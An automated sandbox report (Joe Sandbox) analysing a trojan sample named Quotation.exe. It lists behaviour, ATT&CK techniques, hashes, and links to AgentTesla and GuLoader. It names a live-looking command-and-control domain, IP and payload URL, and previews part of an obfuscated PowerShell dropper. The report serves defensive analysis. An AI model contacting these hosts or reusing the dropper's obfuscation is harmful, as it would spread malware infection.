Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08359594 CreateNamedPipeW, 2_2_08359594
Mitre Att&ck Matrix (bracketed numbers are the report's per-technique counts; techniques without a number are unmatched matrix cells):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation [1]; Command and Scripting Interpreter [1]; PowerShell [2]; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection [112]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading [11]; Virtualization/Sandbox Evasion [41]; Process Injection [112]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery [121]; Process Discovery [1]; Virtualization/Sandbox Evasion [41]; Application Window Discovery [1]; File and Directory Discovery [2]; System Information Discovery [23]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel [12]; Non-Application Layer Protocol [1]; Application Layer Protocol [2]; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID 1417386, sample Quotation.exe, start date 29/03/2024, architecture WINDOWS, score 96):

Quotation.exe is started and drops C:\Users\user\AppData\Local\...\Bowleres.Hed (ASCII); signature: Suspicious powershell command line found. It starts powershell.exe, which drops C:\Users\user\AppData\Local\...\Quotation.exe (PE32); signatures: Obfuscated command line found, Writes to foreign memory regions, Powershell drops PE file. powershell.exe starts wab.exe, conhost.exe and cmd.exe. wab.exe connects to apwisulsel.sa.com (104.128.228.214, port 443, local ports 49710 and 49712; HOSTUS-GLOBAL-ASHostUSHK, United States). svchost.exe is also started and contacts 127.0.0.1. Top-level signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 3 other signatures.

Source | Detection | Scanner | Label
Quotation.exe | 58% | ReversingLabs | Win32.Trojan.Generic
Quotation.exe | 15% | Virustotal |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\Quotation.exe | 58% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\springvandenes\Udstiller48\Kulmuler\Generationsskifternes\Specialudvalg\Quotation.exe | 15% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
apwisulsel.sa.com | 1% | Virustotal |

Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
https://apwisulsel.sa.com/( | 0% | Avira URL Cloud | safe
https://apwisulsel.sa.com/EnPWajJ251.binb | 0% | Avira URL Cloud | safe
https://apwisulsel.sa.com/$ | 0% | Avira URL Cloud | safe
https://apwisulsel.sa.com/EnPWajJ251.bing | 0% | Avira URL Cloud | safe
https://apwisulsel.sa.com/EnPWajJ251.binW | 0% | Avira URL Cloud | safe
http://www.microsoft.coiJa | 0% | Avira URL Cloud | safe
https://apwisulsel.sa.com/EnPWajJ251.bincf& | 0% | Avira URL Cloud | safe
https://apwisulsel.sa.com/EnPWajJ251.bin | 0% | Avira URL Cloud | safe
https://apwisulsel.sa.com/lsel.sa.com/apwisulsel.sa.com5 | 0% | Avira URL Cloud | safe
https://apwisulsel.sa.com/C | 0% | Avira URL Cloud | safe
https://apwisulsel.sa.com/EnPWajJ251.bin | 1% | Virustotal |
http://crl.microz;r | 0% | Avira URL Cloud | safe
https://apwisulsel.sa.com/EnPWajJ251.binoE | 0% | Avira URL Cloud | safe
https://apwisulsel.sa.com/ | 0% | Avira URL Cloud | safe
https://apwisulsel.sa.com/r4 | 0% | Avira URL Cloud | safe
https://apwisulsel.sa.com/ | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
apwisulsel.sa.com | 104.128.228.214 | true | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2084166984.00000000052E6000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2084166984.00000000052E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://apwisulsel.sa.com/EnPWajJ251.bing | wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.ver) | svchost.exe, 00000005.00000002.2392550483.0000022135C00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
https://apwisulsel.sa.com/EnPWajJ251.binb | wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6 | powershell.exe, 00000002.00000002.2084166984.0000000005191000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | Quotation.exe, Quotation.exe.2.dr | false | | high
https://apwisulsel.sa.com/$ | wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://apwisulsel.sa.com/( | wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2084166984.00000000052E6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apwisulsel.sa.com/EnPWajJ251.binW | wab.exe, 0000000E.00000002.2393553213.0000000006EE9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.2112888645.0000000006EE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.coiJa | powershell.exe, 00000002.00000002.2094251518.0000000008B30000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://apwisulsel.sa.com/EnPWajJ251.bincf& | wab.exe, 0000000E.00000002.2393553213.0000000006EE9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://apwisulsel.sa.com/EnPWajJ251.bin | wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.2392316689.0000000006ED3000.00000004.00000020.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://apwisulsel.sa.com/lsel.sa.com/apwisulsel.sa.com5 | wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/Prod-C: | edb.log.5.dr | false | | high
https://contoso.com/ | powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://g.live.com/odclientsettings/ProdV2-C: | svchost.exe, 00000005.00000003.1202909008.0000022135BB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2088496728.00000000061F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apwisulsel.sa.com/C | wab.exe, 0000000E.00000002.2392316689.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.microz;r | powershell.exe, 00000002.00000002.2094251518.0000000008B8C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
https://apwisulsel.sa.com/EnPWajJ251.binoE | wab.exe, 0000000E.00000002.2392316689.0000000006EC4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2084166984.0000000005191000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apwisulsel.sa.com/ | wab.exe, 0000000E.00000003.1781879858.0000000006EAD000.00000004.00000020.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://apwisulsel.sa.com/r4 | wab.exe, 0000000E.00000002.2392316689.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.128.228.214 | apwisulsel.sa.com | United States | 7489 | HOSTUS-GLOBAL-ASHostUSHK | false
                        IP
                        127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1417386
Start date and time: 2024-03-29 07:30:41 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Quotation.exe
Detection: MAL
Classification: mal96.troj.winEXE@9/16@1/2
                        EGA Information:
                        • Successful, ratio: 50%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 152
                        • Number of non-executed functions: 23
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 23.33.180.114
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target wab.exe, PID 7040 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                        • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
07:31:14 | API Interceptor | 43x Sleep call for process: powershell.exe modified
07:31:16 | API Interceptor | 2x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.128.228.214 | DHL.exe | malicious | AgentTesla, GuLoader |
| JOU24013126.exe | malicious | AgentTesla |
| Unpaid INV02.exe | malicious | AgentTesla, GuLoader |
| DHL Booking.exe | malicious | AgentTesla, GuLoader |
| DHL Booking.exe | malicious | AgentTesla, GuLoader |
| PI.1.exe | malicious | AgentTesla, GuLoader |
| DHL Booking.exe | malicious | AgentTesla, GuLoader |
| DHL Booking.exe | malicious | AgentTesla, GuLoader |
| Quote.exe | malicious | AgentTesla, GuLoader |
| DHL-101667365.exe | malicious | AgentTesla, GuLoader |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
apwisulsel.sa.com | DHL.exe | malicious | AgentTesla, GuLoader | 104.128.228.214
| JOU24013126.exe | malicious | AgentTesla | 104.128.228.214
| Unpaid INV02.exe | malicious | AgentTesla, GuLoader | 104.128.228.214
| DHL Booking.exe | malicious | AgentTesla, GuLoader | 104.128.228.214
| DHL Booking.exe | malicious | AgentTesla, GuLoader | 104.128.228.214
| PI.1.exe | malicious | AgentTesla, GuLoader | 104.128.228.214
| DHL Booking.exe | malicious | AgentTesla, GuLoader | 104.128.228.214
| DHL Booking.exe | malicious | AgentTesla, GuLoader | 104.128.228.214

Match | Associated Sample Name / URL | Detection | Threat Name | Context
HOSTUS-GLOBAL-ASHostUSHK | DHL_DOCUMENT_73838374673_6647383743_PDF.vbs | malicious | Remcos, GuLoader | 185.185.40.11
| DHL.exe | malicious | AgentTesla, GuLoader | 104.128.228.214
| JOU24013126.exe | malicious | AgentTesla | 104.128.228.214
| Unpaid INV02.exe | malicious | AgentTesla, GuLoader | 104.128.228.214
| New_order_requirments_7383882736_pdf.vbs | malicious | Remcos, GuLoader | 185.185.40.11
| DHL Booking.exe | malicious | AgentTesla, GuLoader | 104.128.228.214
| DHL Booking.exe | malicious | AgentTesla, GuLoader | 104.128.228.214
| PI.1.exe | malicious | AgentTesla, GuLoader | 104.128.228.214
| DHL Booking.exe | malicious | AgentTesla, GuLoader | 104.128.228.214
| DHL Booking.exe | malicious | AgentTesla, GuLoader | 104.128.228.214
                                            No context
                                            No context
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.7946103555693362
Encrypted: false
SSDEEP: 3072:yJjAgNE4Pj5vHcjTcyBP9UjaaQ/ka4qWz:QAgN8nj/ka4
MD5: 6CCE8320B4264B1DF8F753016B70F56B
SHA1: 5A0F55907D5BDDE28F3E99A2730CA9529FCFE06D
SHA-256: CAEDA415B301FD75CADF8B2FFC850333C700D330493EFD2AD7E49D9A719D0540
SHA-512: C94F559353E64BB3A91D290E2026A55A4DF09AC8514D1BA6809F6F0A4DDD3F94F82650C418E3CC1D48ADEBB336511E7C48B0749DC0660EE698F286B5F3D18F45
Malicious: false
Reputation: low
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8bbcd9d1, page size 16384, DirtyShutdown, Windows version 10.0
                                            Category:dropped
                                            Size (bytes):1310720
                                            Entropy (8bit):0.7864766502936879
                                            Encrypted:false
                                            SSDEEP:1536:7SB2ESB2SSjlK/6vDfi5Wy10MctJ+t9ka4XQ0/Ykr3g16L2UPkLk+kyt4eCu3uZB:7azaovh7uka4Es2U1RFNp3pvHzrHBHz
                                            MD5:20E01625EAF307840CC892FA1CCC627F
                                            SHA1:FF69B42063FFC3CB012703DFE730F34CDE87188D
                                            SHA-256:290925E36E3ECE79CFE3F054AB8082EEE75BDA40FB0B932AE0B01B216D9B1624
                                            SHA-512:E31F91B0817E769DF6EB72DCF519998B42B28F9C04E6293A45452DCE7405D8A384142CED48E80DF84D111B724F91E603118D95A4D3DD1B543A3686CF3D993692
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):16384
                                            Entropy (8bit):0.08174181027402991
                                            Encrypted:false
                                            SSDEEP:3:sdDS/llKYeCcZW/Msjv/Ss/IGYZX/WY1mElillSdLvl+/rS56/:sBi/KztZXsYenpQN0e
                                            MD5:1C7F9927E051D4D9CC14F2275A9F1DB7
                                            SHA1:D6C86511B1BE860235AEBB821F7612C6E5A00144
                                            SHA-256:56FADA178E8E5C7DF49CE35AF4864AF6AE3DF060A554807241BA17400840C4F9
                                            SHA-512:2AAB77AD5A8CAF4115ED9A1A39C09D735DAF3C3491261C58B3FE9E323713F6F319E313E6E30E7232F500CA0BA4F32D24E7BEBBF214AE4D48DE78F268B8E0980B
                                            Malicious:false
                                            Reputation:low
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):8003
                                            Entropy (8bit):4.838950934453595
                                            Encrypted:false
                                            SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                            MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                            SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                            SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                            SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Users\user\Desktop\Quotation.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):310341
                                            Entropy (8bit):7.70409389821086
                                            Encrypted:false
                                            SSDEEP:6144:idBXMazGv40rZ1ZxKoIi40BDATbdSg9KY4nuqokAy+648IEUF1/O:icaP0rZGz0B8TB8Zu8f9UfO
                                            MD5:FE4EBE69BAD1C16FA19972B1E96D92C1
                                            SHA1:4923C0A9C1F6834FD58BE6076C590F627E0B6B38
                                            SHA-256:B71F58D241958F81AFDBF9AF0DC43C8DDD3FB6A60412A55FD13EA2FF4A2EA92E
                                            SHA-512:1552544FFBB4BF46C1D101271A526053EC77C13C8C1B53BAC5AECC12E86314EEB2A25C4810683013701CFCD18564CFE6D21E9743378AFB8C1194497A6D631573
                                            Malicious:false
                                            Process:C:\Users\user\Desktop\Quotation.exe
                                            File Type:ASCII text, with very long lines (58742), with no line terminators
                                            Category:dropped
                                            Size (bytes):58742
                                            Entropy (8bit):5.335849651135647
                                            Encrypted:false
                                            SSDEEP:1536:CdJDUEXzADTjS74atE7VtzDQeJQ3XAGPc2FD1lnWUaZDr+Be6SnQ:WJDUEXzITjDhNpCRPcoBlJIf+QnnQ
                                            MD5:B36B0DD89B921F0AB2479E4152D2BAFA
                                            SHA1:7FC2C95C52394D17A0E045DD264E05C3F0230FE0
                                            SHA-256:E645830CBAE91437C7DEDA618926095D71A44662BB797B1196A9B9FCF3E8E58F
                                            SHA-512:433D5D10478C7198CC772264683B3340C9474A2B01306DC6D247DD7369796E32D31AE0B27157B4FBF65ED077AB13FDF6305B8F6A16EC2DE02019EE89977D5C1B
                                            Malicious:true
                                            Preview:$Thomisme=$cassava;<#Thailnderes Enforcive Strbsommes Ivrkstterne Youngish #><#Lonesomes posthusets Mundingen Capturable Greffier Tuppences Servicernes #><#Egenkapitaler Cypriotiske godkendelsesansgninger Dumpeprocenters Dialektforskningens Emballage Sorrance #><#Nonmutably Elektrokardiogrammer Churchmanship Skinball Satiriseringerne Brasekartoflen Konomibegrebet #><#pengelnsudviklings Socialiseringslovs Sygesikring #><#Hegemoniets Abrase Klaptorsken Rensningsprocessernes #><#Businesses Seborrhoea Skjoldbruskens #><#mikael alarmist Witness #><#Hyperlipemia Frygteligste Mercerisering #><#Datauheldenes kosakkernes Milieuforstyrrelser Intensitometer Cigarmagernes Soldanrie Radiser #><#dissolutionist Hopon Wreathing #><#Taprest Bilfragter Universityship #><#Alfons Ravnekrogsmentalitetens Skrivestillingen Tiljublingen #><#Briner Omasa Vittigt #><#Spytstenenes Declined Forretningsforbindelse Kurvblomstfamilie Bevaringsvrdigst #><#Kontroltasterne Acraldehyde unmelodic Sporvognsbilletternes Ma
                                            Process:C:\Users\user\Desktop\Quotation.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):261968
                                            Entropy (8bit):0.4330674979527136
                                            Encrypted:false
                                            SSDEEP:384:rtdlg6RUtYhD99da2eRBbphP7fe/3EtUbVgZTGaLB6wFFoYGogiGJF210bIdX0aB:JkM4ZlhPqyZTGHsdEDRbd698
                                            MD5:B2D7923E813E6441881FA0CA3EFF4CF2
                                            SHA1:F5DFC97492BF74D6392F974324A3C19B10130424
                                            SHA-256:AFF21818C78204023BD1DBD1A9D284FBC820B76C3971018BCA5744EE9EBCEE73
                                            SHA-512:4C4A72F5F6E10BCF37787003A761033B3DE075CF444D4DD2248AB942E588E1A18F214EAE3E0EE76CA3151B704704460EF936DDB029EB6496DF5AB34F3AE7CB5A
                                            Malicious:false
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Category:dropped
                                            Size (bytes):806728
                                            Entropy (8bit):7.047498444456538
                                            Encrypted:false
                                            SSDEEP:12288:shUQmD3ceDqZWN1gJX58mnigb+Wj1pDpj1m2I4eoGoOI:shUD3cZWbSX584fzDpj1mMkoV
                                            MD5:833003BDB504BA4D779A2AFF899859E0
                                            SHA1:8ACB52C29E7EDC16E99A1DCF96F2A9ABC6045771
                                            SHA-256:076191D0AD7379E339A2824BB74C2C1906477A32BE3F92318C436500CDCF0AF9
                                            SHA-512:D0E8EB7838074BB64D389439CB5E0DB0B238DFE4E68089828DE63D675815B95A0606613D18DFA8DC0ECF35C62128808488ACDFCBB06BBB3C0BC81065DC3AD462
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 58%
                                             • Antivirus: Virustotal, Detection: 15%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................d...*......Y3............@.......................................@..............................................y..........x6...............................................................................................text....b.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...................................rsrc....y.......z..................@..@................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
